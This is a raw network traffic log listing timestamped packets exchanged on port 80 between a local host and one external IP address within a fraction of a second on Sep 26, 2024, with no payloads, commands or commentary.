Sep 26, 2024 02:40:17.577625036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577632904 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577639103 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577661037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577687025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577709913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577723026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577748060 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577764034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577795982 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577809095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577821016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577832937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577833891 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577847004 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577853918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577891111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577898979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577920914 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577936888 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577963114 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.577980995 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.577994108 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578006983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578021049 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578041077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578138113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578150988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578164101 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578177929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578178883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578191996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578203917 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578211069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578222036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578243971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578258991 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578278065 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578290939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578315020 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578322887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578335047 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578336000 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578361988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578366995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578377008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578385115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578402042 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578409910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578421116 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578423023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578444004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578460932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578475952 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578511953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578569889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578582048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578593969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578608990 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578609943 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578622103 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578625917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578636885 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578660011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578675985 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578717947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578732967 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578746080 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578762054 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578763962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578780890 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578783035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578794003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578805923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578810930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578833103 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578857899 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.578984976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.578996897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579008102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579021931 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579032898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579035997 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579046965 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579050064 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579062939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579076052 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579104900 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579130888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579144001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579163074 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579174042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579180956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579188108 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579200983 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579200983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579216003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579231024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579267025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579286098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579298019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579329014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579474926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579499006 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579509974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579514980 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579546928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579579115 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579591990 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579603910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579617023 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579618931 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579648018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579683065 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579696894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579722881 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579746008 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579757929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579770088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579781055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579793930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579797983 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579826117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579845905 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.579910040 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579921961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.579952955 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580450058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580472946 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580486059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580497980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580511093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580516100 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580526114 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580537081 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580538988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580549002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580568075 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580585957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580636024 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580647945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580657005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580672026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580693960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580714941 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580739975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580751896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580765009 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580776930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580777884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580799103 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580825090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.580841064 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.580883026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.582107067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.582120895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.582143068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.582150936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.582154989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.582182884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.582206964 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667248964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667277098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667290926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667303085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667316914 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667330027 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667375088 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667402029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667414904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667428970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667429924 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667443037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667457104 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667476892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667490959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667505026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667529106 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667557955 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667602062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667613983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667625904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667639017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667642117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667653084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667664051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667678118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667679071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667690992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667709112 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667728901 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667746067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667788982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667865992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667880058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667891979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667905092 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667907000 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667922020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667928934 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667933941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667948008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.667953968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.667975903 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668003082 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668056965 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668092012 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668104887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668116093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668142080 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668148994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668159962 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668160915 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668195009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668232918 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668245077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668256998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668267965 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668297052 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668659925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668705940 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668715954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668729067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668752909 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668762922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668776989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668777943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668801069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668816090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668900013 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668911934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668925047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668936968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668936968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668952942 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668956041 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.668982029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.668984890 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669020891 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669152975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669167042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669178009 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669190884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669190884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669203997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669209957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669218063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669230938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669244051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669245005 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669258118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669260025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669270992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669287920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669388056 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669429064 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669441938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669454098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669466019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669471979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669478893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669478893 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669504881 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669526100 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669567108 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669579029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669605017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669629097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669684887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669698954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669711113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669723034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669723988 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669735909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669744015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669751883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669764996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669775963 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669786930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.669791937 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.669826031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670015097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670027971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670038939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670052052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670058966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670063972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670075893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670089006 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670089960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670101881 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670114994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670124054 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670128107 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670141935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670145035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670154095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670167923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670171022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670180082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670193911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670201063 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670219898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670248032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670362949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670376062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670387983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670399904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670402050 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670413971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670428038 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670461893 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670501947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670511961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670525074 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670536041 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670547962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670552015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670562029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670572042 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670603037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670634031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670646906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670670986 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670696020 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670928955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.670979023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.670993090 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.671019077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.671030998 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.671053886 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.671055079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.671092033 CEST	49705	80	192.168.2.8	185.215.113.37
